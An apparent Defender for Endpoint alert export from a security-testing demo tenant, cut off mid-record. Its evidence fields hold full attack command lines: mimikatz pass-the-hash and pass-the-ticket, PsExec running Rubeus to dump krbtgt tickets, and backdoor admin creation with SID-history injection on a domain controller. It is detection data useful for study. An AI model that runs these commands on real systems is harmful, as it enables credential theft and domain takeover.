"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:05:47.11Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:05:47.11Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::ptt C:\\M365DAttack\\Admin-Tickets\" exit",
"processCreationTime": "2022-11-21T02:02:26.7968671Z",
"processId": 1648,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:09:04.2266667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::ptt C:\\M365DAttack\\Admin-Tickets\" exit",
"processCreationTime": "2022-11-21T02:06:53.2225756Z",
"processId": 5292,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:13:44.4033333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::ptt C:\\M365DAttack\\Admin-Tickets\" exit",
"processCreationTime": "2022-11-21T02:11:49.9793886Z",
"processId": 11992,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:47.6333333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::ptt C:\\M365DAttack\\Admin-Tickets\" exit",
"processCreationTime": "2022-11-21T02:15:09.1186923Z",
"processId": 10936,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-18T05:15:31.2733333Z
|
Suspicious
|
None
|
jeff
|
corp.local
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-11T08:19:04.5766667Z
|
Suspicious
|
None
|
jeff
|
corp.local
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T06:14:46.34Z
|
Suspicious
|
None
|
hacker
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-21T02:03:43.66Z
|
Suspicious
|
None
|
jeff
|
rnd.local
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001152368929144_695584973
|
641d3076-7cae-4a93-830d-1b38c988e610
| 486
|
MicrosoftDefenderForEndpoint
|
2022-09-30T06:13:56.8929409Z
|
2022-11-19T01:35:42.7033333Z
|
2022-10-01T01:36:00.5066667Z
|
2022-09-30T06:13:06.1839452Z
|
2022-09-30T06:13:06.1839452Z
|
Mimikatz credential theft tool
|
The Mimikatz hacktool was detected on this device. Mimikatz is a credential theft tool that can harvest plaintext passwords, password hashes, smartcard PINs, and Kerberos tickets. An attacker might be trying to harvest credentials to log into this or other devices on the network, by impersonating a valid user.
|
CredentialAccess
|
Resolved
|
High
| 20
|
TerminatedBySystem
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAv
|
8cac979e-6dcc-44ad-8355-480eebaff1c1
|
msftadmin@msdxv2.m365dpoc.com
| null |
Mimikatz
|
[] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "rnd.local",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:13:56.9233333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": "Timed out because a pending action was not approved,Timed out because a pending action was not approved",
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T06:13:51.0033333Z
|
Suspicious
|
None
|
jeff
|
test.domain
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-18T05:10:42.37Z
|
Suspicious
|
None
|
bob
|
MSDXV2
|
S-1-5-18
| null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T06:20:01.6733333Z
|
Malicious
|
None
|
jeff
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-13T16:08:25.23Z
|
Suspicious
|
None
|
darol
|
lab.net
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-13T20:37:53.13Z
|
Suspicious
|
None
|
user1
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-12-22T08:57:32.0566667Z
|
Suspicious
|
None
|
guest
|
NT AUTHORITY
|
S-1-5-18
| null | null |
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
|
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
|
PSEXESVC.exe
|
C:\Windows
| 4,216
|
PSEXESVC.exe
|
2022-12-22T08:47:50.8661147Z
| 748
|
2022-12-22T08:38:52.5569028Z
|
services.exe
|
C:\Windows\System32
|
Detected
|
4f111b3b2366eacdcc66d7ad73548fff9b039c15
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-11T08:20:22.8833333Z
|
Suspicious
|
None
|
MSDXV2-Win10V$
|
evilcorp.cn
|
S-1-5-18
| null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-09-30T06:15:47.8633333Z
|
Suspicious
|
Active
|
hacker
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1107
|
0808dea1-2ec8-41d2-8e3e-7c18309fab09
|
steve@msdxv2.m365dpoc.com
|
6cbce4a295c163791b60fc23d285e6d84f28ee4c
|
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
| 840
|
powershell.exe -Command "Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \"S-1-5-32-544\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters).\"DSA Database file\""
|
2022-09-30T06:13:42.2990117Z
| 3,132
|
2022-09-30T06:13:29.1932614Z
|
cmd.exe
|
C:\Windows\System32
|
Detected
|
e138ecd8e7b21eaf952cb35d56349bf50c64ac96
|
da638001152861365786_1066719315
|
0001b09e-7603-4f3e-af36-e744217a8a08
| 486
|
MicrosoftDefenderForEndpoint
|
2022-09-30T06:14:46.1365973Z
|
2022-11-19T01:35:42.7033333Z
|
2022-10-01T01:36:00.5066667Z
|
2022-09-30T06:11:54.4489902Z
|
2022-09-30T06:11:54.4489902Z
|
Malicious credential theft tool execution detected
|
A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
|
CredentialAccess
|
Resolved
|
High
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
|
msftadmin@msdxv2.m365dpoc.com
| null | null |
[
"T1003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "prod.env",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:14:46.34Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:14:46.34Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "0b777e92992c7a306b8a28c7994078e334000781",
"sha256": "ba304316603a46ebca501de75bf7cf05c32e885e5b1120e0b94827002d0d1ad6",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:46.34Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-30T06:11:13.210308Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4064,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-09-30T06:11:53.2107428Z",
"processId": 11068,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037516310417026_-853313044
|
4cf944af-1dca-40d3-8e81-6c075c09b017
| 686
|
MicrosoftDefenderForEndpoint
|
2022-11-11T08:20:31.0417298Z
|
2022-11-12T01:35:43.1766667Z
|
2022-11-12T01:35:42.84Z
|
2022-11-11T08:17:12.8006493Z
|
2022-11-11T08:17:58.1736723Z
|
PsExec launched a command on a remote device
|
PsExec was used to launch a command on a remote device. PsExec is a tool used to launch programs on remote, or local devices. An attacker might be leveraging this tool to launch malicious commands to a remote device and move laterally in the organization.
|
LateralMovement
|
Resolved
|
Medium
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
40eca4c4-8854-418a-8024-fff7c9d7b077
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1021",
"T1021.002",
"T1569.002"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "internal.corp",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:20:31.0933333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:20:31.0933333Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-11-11T08:17:12.5367426Z",
"processId": 2352,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:20:31.0933333Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:17:12.5367426Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 2352,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-11-11T08:17:13.2310192Z",
"processId": 3344,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:20:34.41Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads\\internal'",
"processCreationTime": "2022-11-11T08:16:44.2952776Z",
"processId": 4704,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:20:34.41Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4704,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-11T08:17:36.7285467Z",
"processId": 5872,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072958361208636_-774564177
|
dacbe670-c799-4085-9e4b-0c16dbfa3330
| 975
|
MicrosoftDefenderForEndpoint
|
2022-12-22T08:50:36.1208906Z
|
2022-12-22T08:50:42.2233333Z
| null |
2022-12-22T08:47:23.1371052Z
|
2022-12-22T08:47:28.9843705Z
|
Suspicious Permission Groups Discovery
|
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
|
Discovery
|
New
|
Low
| null |
UnsupportedAlertType
| null | null |
WindowsDefenderAtp
|
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
| null | null | null |
[
"T1069.001",
"T1069.002",
"T1087.001"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "test.domain",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Inactive",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] |
[
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:50:36.15Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:50:36.15Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
